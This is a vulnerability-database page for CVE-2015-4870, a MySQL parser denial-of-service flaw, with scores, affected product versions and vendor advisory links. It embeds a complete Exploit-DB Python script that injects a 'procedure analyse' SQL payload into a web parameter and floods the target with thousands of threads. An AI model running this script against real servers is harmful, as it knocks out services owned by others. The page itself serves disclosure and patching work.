CVE-2015-4870 : Detail

CVE-2015-4870

0.34%V3
Network
2015-10-21
21h00 +00:00
2018-01-04
18h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Unspecified vulnerability in Oracle MySQL Server 5.5.45 and earlier, and 5.6.26 and earlier, allows remote authenticated users to affect availability via unknown vectors related to Server : Parser.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE Other No informations.

Metrics

Metrics Score Severity CVSS Vector Source
V2 4 AV:N/AC:L/Au:S/C:N/I:N/A:P [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 39867

Publication date : 2016-05-29 22h00 +00:00
Author : Osanda Malith Jayathissa
EDB Verified : No

#!/usr/bin/env python # Title: MySQL Procedure Analyse DoS Exploit # Author: Osanda Malith Jayathissa (@OsandaMalith) # E-Mail: osanda[cat]unseen.is # Version: Vulnerable upto MySQL 5.5.45 # Original Write-up: https://osandamalith.wordpress.com/2016/05/29/mysql-dos-in-the-procedure-analyse-function-cve-2015-4870/ # This exploit is compatible with both Python 3.x and 2.x # CVE: CVE-2015-4870 from __future__ import print_function import threading import time import sys import os try: import urllib.request as urllib2 import urllib.parse as urllib except ImportError: import urllib2 import urllib try: input = raw_input except NameError: pass host = "http://host/xxx.php?id=1'" payload = " procedure analyse((select*from(select 1)x),1)-- -" payload = urllib.quote(payload) url = host + payload req = urllib2.Request(url) req.add_header('Accept', '*/*') req.add_header('User-Agent', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0') #req.add_header('Cookie', 'security=low; PHPSESSID=uegfnidhcdicvlsrc0uesio455') req.add_header('Connection', '') req.add_header('Content-type', 'text/xml') cls = lambda: os.system('cls') if os.name == 'nt' else os.system('clear') class DoS(threading.Thread): def run(self): print("{0} started!".format(self.getName())) for i in range(100): urllib2.urlopen(req) time.sleep(.2) print("{0} finished!".format(self.getName())) def banner(): print (''' ____ _____ __ /'\\_/`\\ /\\ _`\\ /\\ __`\\/\\ \\ /\\ \\ __ __\\ \\,\\L\\_\\ \\ \\/\\ \\ \\ \\ \\ \\ \\__\\ \\/\\ \\/\\ \\\\/_\\__ \\\\ \\ \\ \\ \\ \\ \\ __ \\ \\ \\_/\\ \\ \\ \\_\\ \\ /\\ \\L\\ \\ \\ \\\\'\\\\ \\ \\L\\ \\ \\ \\_\\\\ \\_\\/`____ \\\\ `\\____\\ \\___\\_\\ \\____/ \\/_/ \\/_/`/___/> \\\\/_____/\\/__//_/\\/___/ /\\___/ \\/__/ ____ ____ /\\ _`\\ /\\ _`\\ \\ \\ \\/\\ \\ ___\\ \\,\\L\\_\\ \\ \\ \\ \\ \\ / __`\\/_\\__ \\ \\ \\ \\_\\ \\/\\ \\L\\ \\/\\ \\L\\ \\ \\ \\____/\\ \\____/\\ `\\____\\ \\/___/ \\/___/ \\/_____/ [*] Author: Osanda Malith Jayathissa (@OsandaMalith) [*] E-Mail: osanda[cat]unseen.is [*] Website: http://osandamalith.wordpress.com [!] Author takes no responsibility of any damage you cause [!] Strictly for Educational purposes only ''') print("[*] Host: {0}".format(host)) input("\n\t[-] Press Return to launch the attack\n") def _start(): try: cls() banner() for i in range(10000): thread = DoS(name = "[+] Thread-{0}".format(i + 1)) thread.start() time.sleep(.1) except KeyboardInterrupt: print ('\n[!] Ctrl + C detected\n[!] Exiting') sys.exit(0) except EOFError: print ('\n[!] Ctrl + D detected\n[!] Exiting') sys.exit(0) if __name__ == '__main__': _start()

Products Mentioned

Configuraton 0

Oracle>>Linux >> Version 7

Oracle>>Solaris >> Version 11.3

Configuraton 0

Opensuse>>Leap >> Version 42.1

Opensuse>>Opensuse >> Version 13.1

Opensuse>>Opensuse >> Version 13.2

Configuraton 0

Oracle>>Mysql >> Version From (including) 5.5.0 To (including) 5.5.45

Oracle>>Mysql >> Version From (including) 5.6.0 To (including) 5.6.26

Configuraton 0

Mariadb>>Mariadb >> Version From (including) 5.5.0 To (excluding) 5.5.46

Mariadb>>Mariadb >> Version From (including) 10.0.0 To (excluding) 10.0.22

Mariadb>>Mariadb >> Version From (including) 10.1.0 To (excluding) 10.1.8

Configuraton 0

Canonical>>Ubuntu_linux >> Version 12.04

Canonical>>Ubuntu_linux >> Version 14.04

Canonical>>Ubuntu_linux >> Version 15.04

Canonical>>Ubuntu_linux >> Version 15.10

Configuraton 0

Debian>>Debian_linux >> Version 7.0

Debian>>Debian_linux >> Version 8.0

Configuraton 0

Redhat>>Enterprise_linux_desktop >> Version 7.0

Redhat>>Enterprise_linux_eus >> Version 7.1

Redhat>>Enterprise_linux_eus >> Version 7.2

Redhat>>Enterprise_linux_eus >> Version 7.3

Redhat>>Enterprise_linux_eus >> Version 7.4

Redhat>>Enterprise_linux_eus >> Version 7.5

Redhat>>Enterprise_linux_eus >> Version 7.6

Redhat>>Enterprise_linux_eus >> Version 7.7

Redhat>>Enterprise_linux_server >> Version 7.0

Redhat>>Enterprise_linux_server_aus >> Version 7.3

Redhat>>Enterprise_linux_server_aus >> Version 7.4

Redhat>>Enterprise_linux_server_aus >> Version 7.6

Redhat>>Enterprise_linux_server_aus >> Version 7.7

Redhat>>Enterprise_linux_server_tus >> Version 7.3

Redhat>>Enterprise_linux_server_tus >> Version 7.6

Redhat>>Enterprise_linux_server_tus >> Version 7.7

Redhat>>Enterprise_linux_workstation >> Version 7.0

Configuraton 0

Fedoraproject>>Fedora >> Version 23

References

http://www.securityfocus.com/bid/77208
Tags : vdb-entry, x_refsource_BID
http://rhn.redhat.com/errata/RHSA-2016-1481.html
Tags : vendor-advisory, x_refsource_REDHAT
http://www.securitytracker.com/id/1033894
Tags : vdb-entry, x_refsource_SECTRACK
https://access.redhat.com/errata/RHSA-2016:1132
Tags : vendor-advisory, x_refsource_REDHAT
http://rhn.redhat.com/errata/RHSA-2016-0534.html
Tags : vendor-advisory, x_refsource_REDHAT
http://www.ubuntu.com/usn/USN-2781-1
Tags : vendor-advisory, x_refsource_UBUNTU
http://rhn.redhat.com/errata/RHSA-2016-1480.html
Tags : vendor-advisory, x_refsource_REDHAT
http://www.debian.org/security/2015/dsa-3385
Tags : vendor-advisory, x_refsource_DEBIAN
http://www.debian.org/security/2015/dsa-3377
Tags : vendor-advisory, x_refsource_DEBIAN
http://rhn.redhat.com/errata/RHSA-2016-0705.html
Tags : vendor-advisory, x_refsource_REDHAT
https://www.exploit-db.com/exploits/39867/
Tags : exploit, x_refsource_EXPLOIT-DB